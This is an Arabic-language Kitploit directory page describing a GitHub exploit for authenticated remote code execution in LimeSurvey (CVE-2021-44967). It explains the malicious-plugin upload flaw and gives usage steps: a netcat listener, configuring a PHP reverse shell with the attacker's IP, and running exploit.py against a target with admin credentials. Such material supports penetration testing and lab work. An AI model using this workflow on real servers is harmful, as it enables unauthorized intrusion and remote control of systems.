Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
-Limesurvey-RCE-CVE-2021-44967 — 🔥 استغلال RCE آلي لـ Limesurvey (CVE-2021-44967). سلسلة استغلال محسّنة لتصعيد الامتيازات. 🚀 | Kitploit
أدوات/GitHubGitHub/kikechans/-limesurvey-rce-cve-2021-44967
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubkikechans/-limesurvey-rce-cve-2021-44967

-Limesurvey-RCE-CVE-2021-44967

🔥 استغلال RCE آلي لـ Limesurvey (CVE-2021-44967). سلسلة استغلال محسّنة لتصعيد الامتيازات. 🚀

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
منذ 2 أشهرلم تتم المراجعة بعد

🚀 LimeSurvey RCE (CVE-2021-44967) - تنفيذ الأوامر عن بُعد مع المصادقة

يحتوي هذا المستودع على استغلال وظيفي لـ CVE-2021-44967، وهي ثغرة تنفيذ الأوامر عن بُعد مع المصادقة في LimeSurvey.

🎯 التوافق

تم اختباره وتأكيد عمله على:

  • LimeSurvey 5.2.x
  • LimeSurvey 6.x

🐛 نظرة عامة على الثغرة

تسمح الثغرة لمستخدم مصادق عليه بصلاحيات إدارية برفع إضافة ضارة. نظرًا لأن LimeSurvey لا تتحقق بدقة من محتويات ملف ZIP الخاص بالإضافة أو تمنع تنفيذ ملفات PHP في دليل الإضافة، يمكن للمهاجم تحقيق تنفيذ الأوامر عن بُعد (RCE) عن طريق الوصول المباشر إلى القشرة المرفوعة.

✨ الميزات

  • 🤖 استغلال آلي: يقوم بتسجيل الدخول، ومعالجة رموز CSRF، ورفع الإضافة، وتثبيتها، وتفعيلها تلقائيًا.
  • ✅ توافق محسّن: تم تحديث config.xml للتوافق مع إصدارات LimeSurvey من 3.0 إلى 6.0.
  • 💣 حمولات مرنة: تتضمن قشرة عكسية PHP قوية.

🛠️ الاستخدام

1️⃣ تجهيز المستمع

ابدأ مستمع netcat على جهازك:

root@kitploit:~
nc -lvnp 443

2️⃣ تكوين القشرة العكسية

قم بتعديل php-rev.php واضبط عنوان IP المحلي والمنفذ:

root@kitploit:~
$ip = '<YOUR_IP>';
$port = 443;

3️⃣ تشغيل الأداة الاستغلالية

root@kitploit:~
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>

مثال:

root@kitploit:~
python3 exploit.py http://10.129.1.243/survey admin test

📁 هيكل المستودع

  • 🐍 exploit.py: البرنامج النصي الرئيسي للأتمتة.
  • 🐘 php-rev.php: حمولة القشرة العكسية PHP.
  • ⚙️ config.xml: ملف تكوين إضافة LimeSurvey الإلزامي.

⚠️ إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية واختبارات الأمان المصرح بها فقط. مخصصة للاستخدام في بيئات قانونية خاضعة للرقابة فقط (مثل CTFs، أو بيئات المختبرات، أو المهام المصرح بها). المؤلف غير مسؤول عن أي إساءة استخدام أو أضرار تسببها هذه الأداة. استخدمها بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها.

تنزيل الأداة